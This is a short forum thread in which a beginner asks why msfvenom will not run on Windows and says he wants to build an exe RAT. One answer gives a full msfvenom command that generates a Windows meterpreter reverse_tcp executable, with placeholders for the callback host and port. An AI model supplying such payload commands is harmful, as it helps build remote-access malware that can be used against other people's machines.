menu search
brightness_auto
more_vert

I'm trying to execute msfvenom -h in metasploit, but it doesn't execute it. what could be the reason? 

  • It is on Windows.
  • Metasploit Community version
  • I'm trying to create a exe RAT
  • I'm noob.

Looking forward for any help. 

thumb_up_off_alt 0 like thumb_down_off_alt 0 dislike

2 Answers

more_vert

Its a typical Permission Error , setting up own Development Environment can be bit difficult thats why i always suggest everyone to get it done on Kali , as it comes with everything in a working condition.

Usually you can Install MSF using the Source Code or the Binaries ,it takes care of all the dependencies ..

but can you tell me your exact syntax which you are using to compile an apk ? that would allow me to help you better

thumb_up_off_alt 0 like thumb_down_off_alt 0 dislike
more_vert
You need to run msfvenom from your cmd command line, not from msf. Change directory to where msfvenom.bat is located and runt it. Like this:

C:\metasploit>msfvenom.bat -p windows/meterpreter/reverse_tcp --platform windows-a x86 -f exe LHOST=yourIPhere LPORT=yourPORThere -o yourfile.exe

More info here: https://blog.didierstevens.com/2017/08/14/using-metasploit-on-windows/
thumb_up_off_alt 1 like thumb_down_off_alt 0 dislike
Welcome to Ask Techie
Ask questions and receive answers from other members of the community. Hacking, Technology, Gaming, Programming, Blockchain and everything to get you going with your Cyber World.

222 questions

227 answers

401 comments

726,946 users

...